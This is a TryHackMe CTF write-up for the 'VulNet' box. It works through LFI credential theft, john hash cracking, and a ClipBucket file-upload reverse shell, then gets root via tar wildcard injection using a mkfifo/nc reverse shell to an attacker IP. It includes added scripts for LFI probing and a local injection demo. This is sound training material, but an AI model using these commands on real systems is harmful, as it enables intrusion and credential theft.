TryHackMe: VulNet

DebianHat
5 min read, Mar 25, 2021

Content:

1. Introduction
2. Scanning and Enumeration
3. Initial Footholds
4. Privilege Escalation
5. Conclusion

Introduction:

VulNet is a medium difficulty box. Solving it exercises LFI, vhost enumeration, reading Apache config files through the LFI, hash cracking, exploiting a file upload vulnerability, and privilege escalation.

The foothold is an unauthenticated file upload vulnerability in ClipBucket.

Scanning and Enumeration:

Once the machine is up, start as usual with an nmap scan (rustscan works too). Before that, add vulnnet.thm to your /etc/hosts file.

$ nmap -v -sV -sC {machine-ip}

Nmap shows two open ports: 22 (SSH) and 80 (Apache HTTP).
That leaves one way forward: enumerating the web host.

Results from nmap scan.

Browsing to vulnnet.thm lands on a simple web page whose sign-in form looks like a candidate for attack.
Before working through the page I ran DirBuster to look for hidden directories.
Attacking the login portal was a dead end, and DirBuster found nothing either, but reading the page source turned up two JavaScript files.

Hosted Web Page
JavaScript files in source code

Going through those two JS files turned up a virtual host, broadcast.vulnnet.thm, and the endpoint vulnnet.thm/index.php?referer=, whose referer parameter looked like a file inclusion candidate.
Note: I ran the JS files through a beautifier first to make the minified code readable.

I tried reading common Linux files such as /etc/passwd through the parameter, and it worked.
Since the server is Apache, I went for its config files next; the site config is worth reading first because its AuthUserFile directive tells you where the password file lives. The .htpasswd file gave up a username and a password hash:
developer:[REDACTED]

With a hash in hand, the first thing to do is try cracking it. An Apache htpasswd hash starting with $apr1$ is md5crypt, which john detects on its own:

$ john --wordlist=/usr/share/wordlists/rockyou.txt [hashfile]
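The LFI probing and hash identification above, as an added example that is not part of the original post: a small POSIX shell script that walks a list of files worth reading through the referer parameter, flags the ones that came back, and maps any .htpasswd hashes to the john format (or hashcat mode) that cracks them. The URL shape is the post's; the Apache config and .htpasswd paths in the list are the usual Debian/Ubuntu locations and are an assumption, not paths confirmed by the post.

```shell
#!/bin/sh
# Added example, not code from the original post.
# Probe an LFI parameter for files that matter on a Linux/Apache host and
# identify the hash type of any .htpasswd lines so john gets the right format.

# Files worth reading through the LFI, in the order to try them. The Apache
# paths are the default Debian/Ubuntu layout (assumption); adjust to target.
lfi_targets() {
    cat <<'EOF'
/etc/passwd
/etc/apache2/apache2.conf
/etc/apache2/sites-enabled/000-default.conf
/etc/apache2/.htpasswd
EOF
}

# Build the probe URL for one path. The path is passed as-is because the
# post's LFI needed neither traversal nor encoding; adjust if the target filters.
lfi_url() {
    base="$1"; param="$2"; path="$3"
    printf '%s?%s=%s\n' "$base" "$param" "$path"
}

# Fetch each target and report the ones whose body carries a marker the
# normal page does not (passwd entry, Apache directive, htpasswd hash).
# Needs network access to the target; not exercised offline.
lfi_probe() {
    base="$1"; param="$2"
    lfi_targets | while IFS= read -r path; do
        body=$(curl -s -m 10 "$(lfi_url "$base" "$param" "$path")")
        case "$body" in
            *root:x:0:0*|*ServerName*|*DocumentRoot*|*AuthUserFile*|*'$apr1$'*|*'$2y$'*)
                printf '[+] %s\n%s\n\n' "$path" "$body" ;;
            *)  printf '[-] %s\n' "$path" ;;
        esac
    done
}

# Map an .htpasswd hash prefix to the john --format / hashcat mode for it.
hash_kind() {
    case "$1" in
        '$apr1$'*)               echo "apr1-md5 john:md5crypt hashcat:1600" ;;
        '$2y$'*|'$2a$'*|'$2b$'*) echo "bcrypt john:bcrypt hashcat:3200" ;;
        '{SHA}'*)                echo "sha1-base64 hashcat:101" ;;
        *)                       echo "unknown" ;;
    esac
}

# Read user:hash lines (blank lines and comments skipped) and print the
# user together with the hash kind, ready to pick a cracking command.
htpasswd_report() {
    while IFS= read -r line; do
        case "$line" in ''|'#'*) continue ;; esac
        user=${line%%:*}; hash=${line#*:}
        printf '%s %s\n' "$user" "$(hash_kind "$hash")"
    done
}

# Usage: sh lfi.sh http://vulnnet.thm/index.php referer
if [ "$#" -ge 2 ]; then
    lfi_probe "$1" "$2"
fi
```

Pipe the recovered .htpasswd contents into htpasswd_report (for example, `curl -s "$(lfi_url http://vulnnet.thm/index.php referer /etc/apache2/.htpasswd)" | htpasswd_report`) to see which format to hand to john before the wordlist run starts.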

While john ran, I added broadcast.vulnnet.thm to /etc/hosts and browsed to it; it prompted for HTTP basic authentication.

Once john finished, the user:password pair logged me into the vhost, which hosts ClipBucket.
Looking around the app and its source revealed the version number, and that version is vulnerable.
A quick search turned up how to exploit it: an unauthenticated file upload vulnerability.

Initial Footholds:

We know the vulnerability; now to exploit it.

Uploading shell

Grab a PHP reverse shell (pentestmonkey's), set its IP and port, and start a listener on your machine.
The command below uploads the reverse shell to the box:

$ curl -F "file=@rev.php" -F "plupload=1" -F "name=anyname.php" "http://broadcast.vulnnet.thm/actions/photo_uploader.php" -u developers:[REDACTED]

The -u credentials are for Apache's basic auth in front of the vhost; the ClipBucket upload itself requires no application login, which is the bug.
Now browse to the uploaded file and the listener catches the reverse shell.
The upload lands under /files/photos/[file directory].

We have an initial shell on the box.
Stabilize it:

$ python3 -c "import pty; pty.spawn('/bin/bash')"
$ export TERM=xterm

Before running scripts like LinPEAS or LinEnum, I enumerated manually and found an SSH backup archive belonging to the server-management user. I pulled it back to my machine to retrieve the private key.

Target machine (THM), serving the archive:
$ python3 -m http.server

Attacker machine:
$ wget http://{machine-ip}:8000/ssh-backup.tar.gz
$ tar -xvf ssh-backup.tar.gz

The archive contains the user's id_rsa, but the key is passphrase-protected, so the passphrase has to be cracked before the key can be used for SSH. ssh2john.py ships with john (on Kali it is under /usr/share/john/):

$ python3 ssh2john.py id_rsa > id_rsa_hash
$ john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa_hash
$ chmod 600 id_rsa
$ ssh -i id_rsa server-management@vulnnet.thm

That gives access as server-management, where the user flag can be found.
Next, root.

Privilege Escalation:

Again, before running any automated enumeration script, I looked manually for cron jobs, backup files, or root-owned executables writable by the current user.
I found a cron job running /var/opt/backupsrv.sh, and the script under /var/opt is readable by the current user.
Reading it shows what it does: it backs up every file in the Documents directory of server-management.
One detail gets us to root.
The script calls tar on a wildcard (*), which is open to wildcard injection: the shell expands the glob into tar's argument list, so a file whose name starts with -- is parsed by tar as an option rather than as a file to archive.

To get root I dropped a reverse shell script into Documents, added two files named so that they expand into tar's --checkpoint options, and started a listener on my own machine:

$ echo "mkfifo /tmp/obz; nc [Attackers-ip] 4445 0</tmp/obz | /bin/sh 1>/tmp/obz 2>&1; rm /tmp/obz" > shell.sh
$ echo "" > "--checkpoint-action=exec=sh shell.sh"
$ echo "" > --checkpoint=1

Within about 30 to 40 seconds, when the cron job next runs, the listener gets a root shell.
Finally rooted.
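The wildcard injection above, reproduced locally as an added example that is not part of the original post: the script builds a scratch Documents directory with the same two option-named files, runs a backup the way the box's cron job is assumed to (cd into the directory, then tar over an unquoted *), and runs the fixed form beside it. The payload here only creates a marker file instead of opening a reverse shell; the exact contents of /var/opt/backupsrv.sh are an assumption, and GNU tar is required for --checkpoint-action.

```shell
#!/bin/sh
# Added example, not code from the original post.
# Reproduce tar wildcard injection locally and show the fix. Assumes the
# backup script does `cd <Documents> && tar czf <out> *` (not confirmed by
# the post) and that tar is GNU tar, which supports --checkpoint-action.

# Populate a scratch "Documents" directory the way the attacker would:
# a payload script plus two empty files whose NAMES are tar options.
setup_docs() {
    dir="$1"
    mkdir -p "$dir"
    # Benign stand-in for the reverse shell: just drop a marker file.
    printf 'touch "%s"\n' "$dir/PWNED" > "$dir/shell.sh"
    : > "$dir/--checkpoint=1"
    : > "$dir/--checkpoint-action=exec=sh shell.sh"
}

# Vulnerable backup: the unquoted glob hands the option-named files to tar
# as arguments, so tar runs `sh shell.sh` at its first checkpoint.
backup_vulnerable() {
    dir="$1"; out="$2"
    (cd "$dir" && tar czf "$out" *) >/dev/null 2>&1 || true
}

# Fixed backup: archive a path instead of a glob (tar czf out -- * also
# works), so every directory entry is treated as a file name, even one
# that starts with a dash.
backup_safe() {
    dir="$1"; out="$2"
    (cd "$dir" && tar czf "$out" .) >/dev/null 2>&1 || true
}

# Run both variants on a fresh scratch directory and report which one
# executed the payload. Prints "vulnerable=yes safe=no" on a GNU tar host.
run_demo() {
    dir=$(mktemp -d)
    setup_docs "$dir"

    backup_vulnerable "$dir" "$dir.vuln.tgz"
    v=no
    if [ -e "$dir/PWNED" ]; then v=yes; fi
    rm -f "$dir/PWNED"

    backup_safe "$dir" "$dir.safe.tgz"
    s=no
    if [ -e "$dir/PWNED" ]; then s=yes; fi

    rm -rf "$dir" "$dir.vuln.tgz" "$dir.safe.tgz"
    echo "vulnerable=$v safe=$s"
}

run_demo
```

The glob sorts the two injected names ahead of shell.sh, so tar sees --checkpoint-action=exec=sh shell.sh and --checkpoint=1 before any real file. Checkpoints fire per record written, so even a handful of tiny files triggers the action once the final record is flushed; that is why the box's cron job pops a shell within one run.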

Conclusion:

The box was not very difficult; the early phases needed a bit of enumeration.

  1. The web server was misconfigured: client-side JavaScript exposed an endpoint whose parameter led to LFI, and the LFI exposed Apache's config and credentials.
  2. The vhost ran an old, vulnerable version of ClipBucket.
  3. A root cron job ran tar with an unquoted wildcard over a directory the low-privileged user could write to.

Thanks to the creator of this box TheCyb3rW0lf
To learn and practice more visit TryHackMe

Thanks for reading.
Clap for me, if the above content made you explore something.


DebianHat

Penetration Tester, Ethical Hacker, Security Analyst